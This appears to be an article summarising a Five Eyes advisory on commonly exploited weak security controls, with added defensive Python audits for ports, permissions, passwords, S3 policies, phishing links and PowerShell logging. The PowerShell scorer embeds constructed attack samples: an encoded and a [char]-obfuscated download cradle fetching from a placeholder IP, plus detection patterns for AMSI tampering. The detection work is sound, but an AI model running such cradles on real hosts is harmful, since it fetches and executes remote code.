According to a joint security advisory from the Five Eyes cybersecurity agencies of the U.K., U.S., Australia, Canada, and New Zealand, the techniques cyber threat actors most often use to gain initial access are exploitation of public-facing applications, abuse of external remote services, phishing, abuse of trusted relationships, and use of valid credentials for legitimate user accounts.
These techniques succeed largely because of poor security practices, weak cyber hygiene, missing controls, and insecure configurations. The advisory lists the ten weak controls and practices most often exploited by attackers:
Not applying software updates and patches promptly
Failing to update software and apply patches for known vulnerabilities promptly leaves attackers a window in which to exploit them, and public exploits for newly disclosed vulnerabilities often appear within days or weeks. Attackers can use unpatched vulnerabilities to reach sensitive data, launch denial-of-service attacks, or take full control of vulnerable systems. Slow patching is one of the most common weak security practices.
Open ports and misconfigurations that expose services to the Internet
Another frequently identified weakness is leaving open ports that should be closed. Attackers continuously scan for open ports and misconfigured services that expose systems to the Internet. High-risk services such as Server Message Block (SMB), Remote Desktop Protocol (RDP), NetBIOS, and Telnet, if compromised, can give attackers initial access.
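As an added illustration (not part of the advisory), the following Python script audits a host's listening sockets for exactly the high-risk services named above. It parses listener lines in the shape produced by `ss -Hlnt` (the sample below is constructed) and reports any SMB, RDP, NetBIOS or Telnet listener that is not confined to a loopback address; a socket bound to 0.0.0.0 or :: accepts connections on every interface and is therefore exposed wherever the host is reachable.

```python
"""Find high-risk services listening on externally reachable addresses.

Added example, not from the advisory. Parses listener lines in the shape
of `ss -Hlnt` output and reports the services the advisory names (SMB,
RDP, NetBIOS session service, Telnet) that are bound to anything other
than a loopback address. The sample output below is constructed.
"""
import ipaddress

# Ports of the services the advisory singles out as high risk when exposed.
HIGH_RISK_PORTS = {
    23: "Telnet",
    139: "NetBIOS session",
    445: "SMB",
    3389: "RDP",
}

# Constructed sample in the shape of `ss -Hlnt` (header suppressed):
# State Recv-Q Send-Q Local-Address:Port Peer-Address:Port
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
LISTEN 0 50 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 50 10.0.0.12:3389 0.0.0.0:*
LISTEN 0 128 [::]:23 [::]:*
LISTEN 0 128 [::1]:631 [::]:*
"""


def split_addr_port(local: str) -> tuple:
    """Split '1.2.3.4:445' or '[::]:23' into (host, port)."""
    host, _, port = local.rpartition(":")
    return host.strip("[]"), int(port)


def is_wildcard(host: str) -> bool:
    """True when the socket listens on every interface ('*', 0.0.0.0 or ::)."""
    return host == "*" or ipaddress.ip_address(host).is_unspecified


def find_exposed_listeners(ss_output: str) -> list:
    """Return high-risk listeners that are reachable from off-host."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        host, port = split_addr_port(fields[3])
        if port not in HIGH_RISK_PORTS:
            continue
        if host != "*" and ipaddress.ip_address(host).is_loopback:
            continue  # only the host itself can connect
        findings.append({
            "port": port,
            "service": HIGH_RISK_PORTS[port],
            "bind": host,
            "all_interfaces": is_wildcard(host),
        })
    return findings


if __name__ == "__main__":
    for f in find_exposed_listeners(SAMPLE_SS_OUTPUT):
        where = "ALL interfaces" if f["all_interfaces"] else f"address {f['bind']}"
        print(f"{f['service']:<16} port {f['port']:<5} listening on {where}")
```

On the sample data the script reports SMB on 0.0.0.0, Telnet on :: and RDP bound to a single internal address; the last is still reported because an internal bind only helps if the network boundary in front of it is also controlled.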
Failure to enforce multifactor authentication
Multifactor authentication (MFA) should be enforced on all accounts to stop attackers from using stolen credentials. This is particularly important for RDP, accounts with administrative privileges, and other remote services. Missing MFA on RDP is frequently exploited in ransomware attacks.
Use of default credentials and settings
Leaving default credentials in place gives attackers easy access, because vendor defaults are publicly documented. Default settings are usually overly permissive so that products work out of the box, and leaving them unchanged can give attackers an avenue for exploitation.
Inadequate remote access controls
Threat actors commonly target remote services that have weak authentication controls, such as no MFA. Besides enforcing MFA, network defenders should consider placing a boundary firewall in front of the VPN and deploying IDS/IPS sensors to detect anomalous activity.
Incorrectly applied permissions or privileges, and errors in access control lists
Incorrectly applied permissions or privileges can prevent access control rules from being enforced, allowing unauthorized users or system processes to reach objects they should never have access to.
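To make the point concrete, here is an added example (not from the advisory) for POSIX systems: a Python audit that walks a directory tree and reports the permission mistakes that most often let unintended users reach an object. It flags world-writable files and directories (a world-writable directory that carries the sticky bit, like /tmp, is accepted), setuid/setgid executables, and files readable by group or others inside a subtree meant to be private. The tree it inspects is constructed in a temporary directory, and treating a subdirectory named `secrets` as private is an assumed convention.

```python
"""Audit a directory tree for permissions that let unintended users reach objects.

Added example, not from the advisory, for POSIX systems. It walks a tree
and reports world-writable files and directories (a directory that is
world-writable but sticky, like /tmp, is accepted), setuid/setgid
executables, and files readable by group or others inside a subtree that
is meant to be private. The tree is constructed in a temporary directory
so the script can be run anywhere; 'secrets' as the private subtree is an
assumed convention.
"""
import os
import stat
import tempfile


def audit_permissions(root: str, private_subdirs=("secrets",)) -> list:
    """Return findings sorted by path, each with the octal mode and reasons."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # judge the target, not the link
            rel = os.path.relpath(path, root)
            problems = []
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                problems.append("world-writable")
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                problems.append("setuid/setgid")
            if (rel.split(os.sep)[0] in private_subdirs and stat.S_ISREG(mode)
                    and mode & (stat.S_IRGRP | stat.S_IROTH)):
                problems.append("readable by group/others inside a private area")
            if problems:
                findings.append({"path": rel, "mode": oct(stat.S_IMODE(mode)), "problems": problems})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree() -> str:
    """Create a constructed tree mixing correct and incorrect permissions."""
    root = tempfile.mkdtemp(prefix="acl-audit-")

    def make(rel, mode, is_dir=False):
        path = os.path.join(root, rel)
        if is_dir:
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("sample\n")
        os.chmod(path, mode)

    make("secrets", 0o700, is_dir=True)
    make("secrets/db_password.txt", 0o600)  # correct: owner only
    make("secrets/api_key.txt", 0o644)      # wrong: every local user can read it
    make("uploads", 0o1777, is_dir=True)    # acceptable: world-writable but sticky
    make("scripts", 0o755, is_dir=True)
    make("scripts/deploy.sh", 0o777)        # wrong: anyone can alter what root later runs
    make("bin", 0o755, is_dir=True)
    make("bin/helper", 0o4755)              # setuid binary: needs justification
    return root


if __name__ == "__main__":
    for finding in audit_permissions(build_sample_tree()):
        print(f"{finding['mode']:<7} {finding['path']:<28} {', '.join(finding['problems'])}")
```

The world-writable script is the classic privilege-escalation path: whoever can edit `scripts/deploy.sh` runs code with the privileges of whatever later executes it.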
Weak password policies
Attackers use a variety of methods to take advantage of weak, leaked, or exposed passwords to gain access to victims' networks. Policies should be set and enforced that require strong, unique passwords. Weak RDP passwords are a common point of compromise.
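The "default credentials" and "weak password policy" items above come down to the same control: checking a credential before it is accepted. The following Python check is an added example, not from the advisory. It rejects unchanged vendor defaults, short or digit-only passwords, passwords that appear on a common/breached list once trailing digits and the usual character substitutions are undone (so `P@ssw0rd2022!` is still "password"), passwords containing the username, and strings with too few distinct characters. The default-credential and common-password lists are short constructed samples standing in for a real vendor-default list and a breached-password corpus, and the 14-character minimum is an assumed policy value.

```python
"""Reject default and weak credentials before they reach production.

Added example, not from the advisory. It applies the checks implied by the
"default credentials" and "weak password policy" items: unchanged vendor
defaults, short or digit-only passwords, passwords on a common/breached
list (after undoing trailing digits and common character substitutions),
passwords containing the username, and strings with too few distinct
characters. Both word lists are short constructed samples.
"""
import re

MIN_LENGTH = 14  # assumed organisational policy value

# Constructed sample of (username, password) vendor defaults.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "toor"),
    ("user", "user"),
}

# Constructed sample of a common/breached password list, stored in the
# normalised form produced by normalize() below.
COMMON_PASSWORDS = {
    "password", "qwerty", "welcome", "letmein", "changeme",
    "iloveyou", "summer", "winter", "football",
}

# Undo the substitutions people use to satisfy complexity rules.
LEET = str.maketrans("@0$13", "aosie")


def normalize(password: str) -> str:
    """Lower-case, drop trailing digits/punctuation, undo leet substitutions,
    so 'P@ssw0rd2022!' and 'Welcome1' compare as 'password' and 'welcome'."""
    core = re.sub(r"[^a-z]+$", "", password.lower())
    return core.translate(LEET)


def check_credentials(username: str, password: str) -> list:
    """Return the policy violations for this pair; an empty list means OK."""
    problems = []
    if (username.lower(), password) in DEFAULT_CREDENTIALS:
        problems.append("unchanged vendor default credential")
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if password.isdigit():
        problems.append("digits only")
    if normalize(password) in COMMON_PASSWORDS:
        problems.append("on the common/breached password list")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    if len(set(password.lower())) <= 3:
        problems.append("too few distinct characters")
    return problems


if __name__ == "__main__":
    # Constructed accounts, as they might come out of a device inventory.
    for user, pw in [("admin", "admin"), ("svc_backup", "P@ssw0rd2022!"),
                     ("root", "111111111111111"), ("jsmith", "correct horse battery staple")]:
        verdict = check_credentials(user, pw) or ["OK"]
        print(f"{user:<12} {', '.join(verdict)}")
```

Note that `P@ssw0rd2022!` passes a typical "upper, lower, digit, symbol" complexity rule and still fails here; comparing against a breached list after normalisation catches what composition rules miss.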
Insecure cloud services
Misconfigurations and weak security settings can leave cloud services exposed, giving threat actors easy access to sensitive data and letting them use cloud servers for cryptojacking.
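The most common form of this misconfiguration is a storage bucket whose policy grants access to anyone. As an added example (not from the advisory), the Python check below inspects an AWS S3 bucket policy document in the JSON structure AWS uses and reports every Allow statement whose Principal is anonymous (`"*"` or `{"AWS": "*"}`), classifying it as public read and/or public write; a statement carrying a Condition is marked for review rather than assumed safe. The two sample policies, the bucket name and the account ID in them are constructed.

```python
"""Detect bucket policies that grant anonymous access.

Added example, not from the advisory. It inspects an AWS S3 bucket policy
document and reports every Allow statement whose Principal is anonymous
("*" or {"AWS": "*"}), classifying it as public read and/or public write.
Statements with a Condition are flagged for review rather than treated as
safe. Both sample policies and the account ID in them are constructed.
"""
import json

READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:*", "*"}
WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:putbucketpolicy",
                 "s3:putbucketacl", "s3:put*", "s3:*", "*"}


def as_list(value) -> list:
    """IAM lets Action/Principal/Resource be a single string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def is_anonymous(principal) -> bool:
    """True if the statement applies to everyone on the Internet."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in as_list(principal.get("AWS"))
    return False


def find_public_statements(policy_json: str) -> list:
    """Return the Allow statements any unauthenticated caller can use.
    NotPrincipal/NotAction inversions are not modelled here."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue  # an explicit Deny for '*' is hardening, not a hole
        if not is_anonymous(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in as_list(stmt.get("Action"))}
        findings.append({
            "sid": stmt.get("Sid", "<no Sid>"),
            "resources": as_list(stmt.get("Resource")),
            "public_read": bool(actions & READ_ACTIONS),
            "public_write": bool(actions & WRITE_ACTIONS),
            # A Condition (e.g. aws:SourceIp) may narrow the grant; review it.
            "needs_condition_review": "Condition" in stmt,
        })
    return findings


# Constructed: the misconfiguration, a bucket readable by the whole Internet.
PUBLIC_READ_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-data-bucket/*"},
        {"Sid": "AccountAdmin", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-data-bucket",
                      "arn:aws:s3:::example-data-bucket/*"]},
    ],
})

# Constructed: the corrected policy, one account only, plus a TLS-only Deny.
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AccountAdmin", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-data-bucket",
                      "arn:aws:s3:::example-data-bucket/*"]},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-data-bucket",
                      "arn:aws:s3:::example-data-bucket/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
})

if __name__ == "__main__":
    for name, doc in [("public", PUBLIC_READ_POLICY), ("scoped", SCOPED_POLICY)]:
        print(name, json.dumps(find_public_statements(doc), indent=2))
```

The Deny statement in the corrected policy also names Principal `"*"`, which is why the check keys on Effect first: a Deny for everyone tightens the bucket rather than opening it.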
Inadequate phishing protection
Phishing is one of the most common ways threat actors gain a foothold in networks. Email security solutions should be deployed that include strong antivirus controls, use behavioral analysis to recognize malware, and can inspect embedded links. Security awareness training should be given to employees regularly.
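"Inspecting embedded links" means more than following them. The Python example below is added here and is not part of the advisory: it extracts every `<a href>` from an HTML message body and flags three classic phishing patterns, visible link text that names one host while the href goes to another, a target that is a bare IP address, and the organisation's own domain used as a subdomain of an unrelated registrable domain. The message body is constructed, and `example.com` stands in for the organisation's real domain.

```python
"""Inspect the embedded links in an HTML e-mail body.

Added example, not from the advisory. It extracts every <a href> from the
message and flags three classic phishing patterns: visible text that names
one host while the href goes to another, a target that is a bare IP
address, and the organisation's own domain used as a subdomain of an
unrelated registrable domain. The message is constructed; 'example.com'
stands in for the organisation's real domain.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OUR_DOMAINS = {"example.com"}  # assumption: the organisation's legitimate domains

# Constructed sample message body.
SAMPLE_EMAIL = """
<p>Your mailbox is almost full. Sign in to keep receiving mail:
<a href="https://example.com.mail-verify.net/login">https://example.com/login</a></p>
<p>Or open the <a href="http://203.0.113.7/reset">account portal</a> directly.</p>
<p>Reminder: the acceptable-use policy is at
<a href="https://intranet.example.com/policy">intranet.example.com/policy</a>.</p>
<p>Questions? Contact the <a href="https://www.example.com/help">help desk</a>.</p>
"""

# Hostname-looking text such as 'example.com/login' or 'https://example.com'.
HOSTNAME_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})")


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for each <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of a URL; bare 'host/path' text is accepted too."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()


def registrable_domain(host: str) -> str:
    """Last two labels: 'login.example.com' -> 'example.com'.
    Simplification: multi-label public suffixes such as co.uk are not handled."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_links(html_body: str) -> list:
    """Return the links that show a phishing indicator, with reasons."""
    extractor = LinkExtractor()
    extractor.feed(html_body)
    findings = []
    for href, text in extractor.links:
        target = host_of(href)
        reasons = []
        if is_ip(target):
            reasons.append("target is a bare IP address")
        shown = HOSTNAME_IN_TEXT.search(text.lower())
        if shown and registrable_domain(shown.group(1)) != registrable_domain(target):
            reasons.append(f"text shows {shown.group(1)} but target is {target}")
        for ours in OUR_DOMAINS:
            # Label-aligned match so 'example.com.mail-verify.net' is caught.
            if f".{target}.".find(f".{ours}.") >= 0 and registrable_domain(target) != ours:
                reasons.append(f"{ours} used as a subdomain of {registrable_domain(target)}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse_links(SAMPLE_EMAIL):
        print(finding["href"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The two legitimate links (an intranet host under `example.com` and the www site) produce no findings, which matters in practice: a link checker that fires on every internal URL gets switched off.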
Inadequate endpoint detection and response
Endpoint detection solutions should be deployed that go beyond signature-based detection, because threat actors frequently use obfuscated malicious scripts and PowerShell to bypass endpoint security tools such as antivirus software.
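To show why signatures alone fall short, here is an added example (not from the advisory): a Python scorer for PowerShell command lines as they appear in process-creation telemetry (Windows event 4688 or Sysmon event 1). It decodes `-EncodedCommand` payloads, which are base64 of UTF-16LE text, and scores behavioural indicators on both the command line and the decoded payload: hidden window, execution-policy bypass, download cradles, in-memory invocation, character-level obfuscation and AMSI tampering. The weights, the threshold, the three command lines and the payload URL are all constructed for illustration; the encoded sample is generated in the block rather than hard-coded.

```python
"""Score PowerShell command lines for obfuscation and in-memory execution.

Added example, not from the advisory. It takes command lines as recorded
in process-creation telemetry (Windows event 4688 / Sysmon event 1),
decodes -EncodedCommand payloads (base64 of UTF-16LE text) and scores
behavioural indicators. Weights, threshold, command lines and the payload
URL are constructed for illustration.
"""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# (name, pattern, weight) applied to the command line plus any decoded payload.
INDICATORS = [
    ("hidden_window", r"-w\w*\s+hidden", 2),
    ("execution_policy_bypass", r"-e(?:p|xecutionpolicy)\s+bypass", 2),
    ("no_profile", r"-nop\w*", 1),
    ("download_cradle",
     r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", 3),
    ("in_memory_execution",
     r"\biex\b|invoke-expression|frombase64string|\[reflection\.assembly\]::load", 3),
    ("string_obfuscation", r"\[char\]|-join|'\s*\+\s*'", 2),
    ("amsi_tamper", r"amsiutils|amsiinitfailed", 4),
]
COMPILED = [(name, re.compile(p, re.IGNORECASE), w) for name, p, w in INDICATORS]
ENCODED_WEIGHT = 3
SUSPICIOUS_THRESHOLD = 5


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None."""
    match = ENCODED_ARG.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmd: str) -> dict:
    """Score one command line; the decoded payload is scanned as well."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = [name for name, rx, _ in COMPILED if rx.search(text)]
    score = sum(w for name, _, w in COMPILED if name in hits)
    if decoded is not None:
        hits.insert(0, "encoded_command")
        score += ENCODED_WEIGHT
    return {
        "command": cmd,
        "decoded": decoded,
        "indicators": hits,
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign-looking",
    }


# Constructed payload and command lines.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    # Routine scheduled task: one weak indicator only.
    r"powershell.exe -NoProfile -File C:\Scripts\Backup-Logs.ps1",
    # Classic encoded download cradle.
    f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED_PAYLOAD}",
    # Same cradle with the 'IEX' alias assembled from [char] codes to dodge a
    # plain-text signature; the cradle and the obfuscation itself still score.
    "powershell.exe -c \"$i=[char]73+[char]69+[char]88; "
    "& $i ((New-Object Net.WebClient).DownloadString('http://203.0.113.7/b.ps1'))\"",
]

if __name__ == "__main__":
    for result in (analyse_command_line(c) for c in SAMPLE_COMMAND_LINES):
        print(f"{result['verdict']:<14} score={result['score']:<3} {result['indicators']}")
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

The third sample is the point of the exercise: a signature for the string `IEX` never sees it, because the alias is built at run time from character codes, but the download cradle and the `[char]` construction are behaviours, and scoring them still flags the command.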